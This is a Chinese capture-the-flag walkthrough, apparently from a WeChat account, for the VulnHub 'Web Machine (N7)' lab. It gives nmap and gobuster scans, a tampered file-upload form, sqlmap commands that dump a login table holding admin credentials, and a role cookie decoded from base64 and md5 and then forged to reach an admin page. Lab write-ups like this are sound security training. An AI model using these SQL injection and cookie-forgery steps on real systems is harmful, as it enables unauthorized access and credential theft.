攻击源IP:192.168.0.108
主机发现:sudo nmap -sP 192.168.0.1/24
---> 目标IP:192.168.0.103
端口扫描:
sudo nmap -sC -sV -p- 192.168.0.103 -oN Web_mechine.nmap
---> 只开放80端口
浏览器访问:192.168.0.103:80
---> 无有用信息
目录扫描:gobuster dir -u http://192.168.0.103 -w ../dict.txt -x .php,.html,.txt
---> index.html ->欢迎页 --> 可跳转peofile.php --> 无内容
---> exploit.html -> 文件上传 -> 随意上传文件 -> 跳转localhost.profile.php -> 修改action: http://192.168.0.103:profile.php -> FLAG{N7
---> profile.php -> 直接打开无内容
---> server_status -> Not Found Apache/2.4.46(Debian)
---> javascript -> Not Found Apache/2.4.46(Debian)
---> enter_network -> 登录页 -> post -> sqlmap爆破
sqlmap -r 1.txt --batch --dbs --> Machine
sqlmap -r 1.txt -D Machine --batch --tables --> login
sqlmap -r 1.txt -D Machine -T login --batch --dump-all --> role:admin username:administrator password:FLAG{N7:KSA_01}
扫一下enter_network/目录:
gobuster dir -u http://192.168.0.100/enter_network/ -w ../dict.txt -x .php,.html,.txt
---> index.php -> 登录界面
---> admin.php
cookie : user=JGFyZ29uMmkkdj0xOSRtPTY1NTM2LHQ9NCxwPTEkV21WdlMxSnRZbmhPWjNkRWFGZGFSUSRnR1BXMVlwWkdRQzVMOXE5VUpMcEQrTC9jYVpQbGtjbzZCYjVUZE1xR1BZ; role=MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253D
MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253D --url解码-->
MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D --url解码-->
MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM= --base64解码-->
21232f297a57a5a743894a0e4a801fc3 --md5解码--> admin
Burp抓包:http://192.168.0.100/admin.php --> role=admin
---> KSA_01}
原文始发于微信公众号(北京路劲科技有限公司):靶机练习No.3 VulnHub靶场 Web Machine(N7)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论